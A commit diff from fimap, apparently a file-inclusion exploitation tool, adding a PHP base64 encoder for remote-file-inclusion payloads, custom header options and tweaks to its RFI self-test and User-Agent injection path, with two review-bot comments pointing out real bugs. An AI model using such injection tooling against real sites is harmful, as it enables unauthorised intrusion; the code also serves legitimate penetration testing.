Commit d6d4e2c1 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Prepared scanning of headers.

parent 1ece49f6
......@@ -399,6 +399,10 @@ class codeinjector(baseClass):
if (postdata != ""):
p = "%s&%s" %(postdata, p)
code = self.doPostRequest(url, p)
if (code == None):
return(None)
#TODO: Cleanup this dirty block :)
if (code.find(testcode[1]) == -1):
self._log("Kickstarter is not present. Injecting kickstarter thru UserAgent...", self.LOG_INFO)
......@@ -473,10 +477,13 @@ class codeinjector(baseClass):
for langName, langObj in langClass.items():
print "Testing language %s..." %(langName)
c, r = langObj.generateQuiz()
enc_c = self.payload_encode(c)
if (settings["dynamic_rfi"]["mode"] == "local"):
print "Testing Local->RFI configuration..."
code = self.executeRFI(settings["dynamic_rfi"]["local"]["http_map"], "", "", c, {})
if (code == c):
if (code == enc_c):
print "Dynamic RFI works!"
for ext in langObj.getExtentions():
print "Testing %s interpreter..." %(ext)
......@@ -495,13 +502,13 @@ class codeinjector(baseClass):
code = self.executeRFI(settings["dynamic_rfi"]["ftp"]["http_map"], "", "", c, {})
if (code != None):
code = code.strip()
if (code == c):
if (code == enc_c):
print "Dynamic RFI works!"
for ext in langObj.getExtentions():
print "Testing %s interpreter..."%(ext)
#settings["dynamic_rfi"]["ftp"]["ftp_path"] = settings["dynamic_rfi"]["ftp"]["ftp_path"] + ext
code = self.executeRFI(settings["dynamic_rfi"]["ftp"]["http_map"] + ext, "", ext, c, {})
if (code == r):
if (code.find(r) != -1):
print "WARNING! Files which ends with %s will be interpreted! Fix that!"%(ext)
else:
pass # Seems to be not interpreted...
......@@ -509,6 +516,7 @@ class codeinjector(baseClass):
else:
print "Failed! Something went wrong..."
print "Code: " + code;
else:
print "Code == None. That's not good! Failed!"
else:
......@@ -579,6 +587,8 @@ class codeinjector(baseClass):
def executeRFI(self, URL, postdata, appendix, content, header):
content = self.payload_encode(content)
if (appendix == "%00"): appendix = ""
if settings["dynamic_rfi"]["mode"]=="ftp":
up = self.FTPuploadFile(content, appendix)
......@@ -594,7 +604,17 @@ class codeinjector(baseClass):
self.deleteLocalPayload(up["local"])
return(code)
def payload_encode(self, content):
if (self.config["p_rfi_encode"] != None):
if (self.config["p_rfi_encode"] == "php_b64"):
content = "<?php echo base64_decode(\"%s\"); ?>"%(base64.b64encode(content))
self._log("Encoded content: %s" %(content), self.LOG_DEBUG)
else:
self._log("Invalid RFI encoder selected!", self.LOG_WARN);
return(content)
def chooseDomains(self, OnlyExploitable=True):
choose = {}
......@@ -603,6 +623,7 @@ class codeinjector(baseClass):
header = ":: List of Domains ::"
textarr = []
doRemoteWarn = False
missingCount = 0
for n in nodes:
host = n.getAttribute("hostname")
......@@ -625,7 +646,10 @@ class codeinjector(baseClass):
else:
textarr.append("[%d] %s" %(idx, host))
idx = idx +1
else:
missingCount += 1
textarr.append("[ ] And %d hosts with no valid attack vectors."%(missingCount))
textarr.append("[q] Quit")
self.drawBox(header, textarr)
if (doRemoteWarn):
......
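Review bot: The new `if (code.find(r) != -1):` in the ftp branch can raise AttributeError, because `code` is reassigned by the `executeRFI(... + ext, "", ext, c, {})` call two lines above and that result is never checked for None, while the earlier call in the same loop is guarded (`if (code != None): code = code.strip()`) and has an else branch reporting `Code == None`; the hunk at the top of the commit also shows a failed request now propagating `return(None)`. Change the line to `if (code != None and code.find(r) != -1):` so a dropped request during the interpreter probe is reported rather than crashing the RFI self-test. If the local branch a few lines up ends in the same `find` test it needs the same guard, but that part is outside the hunk. The enclosing method starts and ends outside the hunk.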
......@@ -250,6 +250,7 @@ if __name__ == "__main__":
config["header"] = {}
config["force-run"] = False
config["force-os"] = None
config["p_rfi_encode"] = None
doPluginsShow = False
doRFITest = False
doInternetInfo = False
......@@ -284,8 +285,8 @@ if __name__ == "__main__":
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"tab-complete" , "cookie=" , "bmin=" , "bmax=" , "dot-trunc-also-unix", "multiply-term=",
"autoawesome" , "force-run" , "force-os="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4", longSwitches)
"autoawesome" , "force-run" , "force-os=" , "rfi-encoder=", "header="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4R:", longSwitches)
startExploiter = False
......@@ -373,6 +374,15 @@ if __name__ == "__main__":
config["p_multiply_term"] = int(v)
if (k in ("--cookie",)):
config["header"]["Cookie"] = v
if (k in ("--header",)):
head = None
value = ""
if (v.find(":") == -1):
head = v
else:
head = v.split(":")[0]
value = ":".join(v.split(":")[1:])
config["header"][head] = value
if (k in ("--bmin",)):
blind_min = int(v)
if (k in ("--bmax",)):
......@@ -381,6 +391,8 @@ if __name__ == "__main__":
config["force-run"] = True
if (k in ("--force-os",)):
config["force-os"] = v
if (k in ("--rfi-encoder")):
config["p_rfi_encode"] = v
#if (k in("-f", "--exploit-filter")):
# config["p_exploit_filter"] = v
......
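Review bot: The option dispatch `if (k in ("--rfi-encoder")):` is missing the tuple's trailing comma, so `k in` is a substring test against the string "--rfi-encoder" rather than a membership test; it only works because no current short option happens to be a substring of that string. The commit also adds `R:` to the getopt short-option string but no branch handles `-R`, so `-R php_b64` is accepted by getopt and silently ignored; `if (k in ("-R", "--rfi-encoder")):` fixes both. In the `--header` branch the name and value come from `v.split(":")` without `.strip()`, so `--header "X-Foo: bar"` stores a value with a leading space and a missing colon stores an empty value; stripping both and rejecting `\r`/`\n` would avoid emitting a malformed header. This `if __name__ == "__main__":` block starts and ends outside the hunks.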